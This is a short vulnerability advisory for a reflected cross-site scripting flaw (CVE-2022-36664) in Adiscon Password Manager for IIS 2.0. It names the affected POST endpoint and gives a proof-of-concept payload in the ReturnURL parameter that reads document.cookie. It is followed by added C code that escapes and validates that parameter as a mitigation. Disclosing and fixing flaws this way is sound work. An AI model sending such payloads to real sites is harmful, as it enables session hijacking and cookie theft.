Password Manager for IIS version 2.0 suffers from a cross-site scripting vulnerability.
# Exploit Title: XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664
Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1
HTTP Payload (Affected Parameter):
ReturnURL=<script>alert(document.cookie)</script>
Cordially,
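A server-side mitigation for the reflected `ReturnURL` parameter reported above, as an added example that is not the vendor's code and not part of the original advisory. It assumes the handler echoes `ReturnURL` into an HTML response; the function names and the fallback path `/` are hypothetical.

```c
#include <stdio.h>
#include <string.h>
/* Added example, not vendor code; assumes ReturnURL is echoed into HTML.
   HTML-encode src into dst (cap bytes). Returns 0, or -1 if dst is too small. */
int html_escape(const char *src, char *dst, size_t cap)
{
    size_t o = 0;
    if (cap == 0) return -1;
    for (; *src; src++) {
        const char *rep = NULL;
        switch (*src) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t n = rep ? strlen(rep) : 1;
        if (o + n >= cap) return -1;      /* keep room for the terminator */
        if (rep) memcpy(dst + o, rep, n); else dst[o] = *src;
        o += n;
    }
    dst[o] = '\0';
    return 0;
}

/* Accept only a same-site relative path, e.g. "/isapi/PasswordManager.dll". */
int return_url_is_safe(const char *u)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/-_.~?&=";
    if (u == NULL || u[0] != '/' || u[1] == '/') return 0; /* no "//host" */
    return strlen(u) < 256 && u[strspn(u, ok)] == '\0';
}

/* Validate, fall back to "/" if rejected, then encode. 1=accepted, 0=fallback, -1=error. */
int render_return_url(const char *param, char *out, size_t cap)
{
    int accepted = return_url_is_safe(param);
    if (html_escape(accepted ? param : "/", out, cap) != 0) return -1;
    return accepted;
}

int main(void)
{
    char buf[128];
    int r = render_return_url("<script>alert(document.cookie)</script>", buf, sizeof buf);
    printf("accepted=%d value=%s\n", r, buf);
    return 0;
}
```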